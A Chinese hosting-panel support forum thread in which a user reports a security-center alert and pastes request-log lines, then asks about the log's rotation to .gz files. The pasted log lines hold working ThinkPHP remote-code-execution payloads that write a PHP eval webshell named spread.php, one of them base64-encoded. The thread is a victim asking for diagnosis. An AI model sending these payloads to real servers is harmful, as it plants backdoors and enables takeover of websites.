【待反馈】异常的日志内容

为了能快速了解并处理您的问题，请提供以下基础信息：

面板、插件版本：7.6.0

系统版本：centos

问题描述：安全中心告警

相关截图（日志、错误）：/www/server/panel/logs/request

这个下面的日志是什么日志文件，安全中心有告警说有异常文件注入  访问的url为["2024-07-16 02:13:00", "124.222.78.12:51659", "POST", "/public/index.php/?s=captcha", "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)", "{'_method': '__construct', 'filter[]': \"file_put_contents('spread.php',base64_decode('PD9waHAgQGV2YWwoJF9QT1NUW3NwcmVhZF0pOz8 '))\", 'method': 'get', 'server[REQUEST_METHOD]': '<?php @eval($_POST[spread]);?>'}", 1]
["2024-07-16 02:13:00", "124.222.78.12:53996", "GET", "/public/index.php?s=index/%5Cthink%5Ctemplate%5Cdriver%5Cfile/write&cacheFile=spread.php&content=%3C?php%20@eval($_POST%5Bspread%5D);?%3E", "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)", "{}", 1]


还有这个目录下面的日志的压缩规则是什么，这个日志的json文件是在每天什么情况下什么时间才会打包为.gz文件呢

您好，这个是面板的操作日志，您面板左侧列表中的日志，操作日志，这个没有固定时间

运维技术阿闯 发表于 2024-7-16 15:28
您好，这个是面板的操作日志，您面板左侧列表中的日志，操作日志，这个没有固定时间 ...

那看上面的那个请求地址，是有人通过面板操作了这种恶意文件的写入吗，我看源文件有这个记录，但是点击面板左侧的日志看不到这个日志呢

运维技术阿闯 发表于 2024-7-16 15:28
您好，这个是面板的操作日志，您面板左侧列表中的日志，操作日志，这个没有固定时间 ...

我看这个压缩是每天都会生成一个 .json.gz的文件，这个如果没有固定时间的话，那么应该有个固定的规则的吧，就是什么情况下才会把这个json文件打包为一个gz文件。
这个可否告知一下，谢谢啦

宝塔用户_mnhkfj 发表于 2024-7-16 15:39
我看这个压缩是每天都会生成一个 .json.gz的文件，这个如果没有固定时间的话，那么应该有个固定的规则的 ...

您好，这边也没有的，这个应该是一个日志切割之类的